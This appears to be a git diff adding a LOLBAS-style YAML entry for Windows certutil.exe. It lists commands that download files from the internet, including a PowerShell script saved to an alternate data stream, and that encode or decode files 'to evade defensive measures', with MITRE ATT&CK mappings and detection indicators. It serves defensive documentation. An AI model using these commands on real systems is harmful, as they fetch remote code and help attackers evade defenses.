diff --git a/certutil.yml.txt b/certutil.yml.txt new file mode 100644 index 0000000..b1aa789 --- /dev/null +++ b/certutil.yml.txt @@ -0,0 +1,76 @@ +--- +Name: Certutil.exe +Description: Windows binary used for handeling certificates +Author: 'Oddvar Moe' +Created: '2018-05-25' +Commands: + - Command: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe + Description: Download and save 7zip to disk in the current folder. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt + Description: Download and save a PS1 file to an Alternate Data Stream (ADS). + Usecase: Download file from Internet and save it in an NTFS Alternate Data Stream + Category: ADS + Privileges: User + MitreID: T1096 + MitreLink: https://attack.mitre.org/techniques/T1096 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -encode inputFileName encodedOutputFileName + Description: Command to encode a file using Base64 + Usecase: Encode files to evade defensive measures + Category: Encode + Privileges: User + MitreID: T1027 + MitreLink: https://attack.mitre.org/wiki/Technique/T1027 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil -decode encodedInputFileName decodedOutputFileName + Description: Command to decode a Base64 encoded file. + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: certutil --decodehex encoded_hexadecimal_InputFileName + Description: Command to decode a hexadecimal-encoded file decodedOutputFileName + Usecase: Decode files to evade defensive measures + Category: Decode + Privileges: User + MitreID: T1140 + MitreLink: https://attack.mitre.org/wiki/Technique/T1140 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\certutil.exe + - Path: C:\Windows\SysWOW64\certutil.exe +Code_Sample: + - Code:546573745f62795f4c696f72(example of the encoded hexadecimal file) +Detection: + - IOC: Certutil.exe creating new files on disk + - IOC: Useragent Microsoft-CryptoAPI/10.0 + - IOC: Useragent CertUtil URL Agent +Resources: + - Link: https://twitter.com/Moriarty_Meng/status/984380793383370752 + - Link: https://twitter.com/mattifestation/status/620107926288515072 + - Link: https://twitter.com/egre55/status/1087685529016193025 +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Moriarty + Handle: '@Moriarty_Meng' + - Person: egre55 + Handle: '@egre55' + - Person: Lior Adar +--- \ No newline at end of file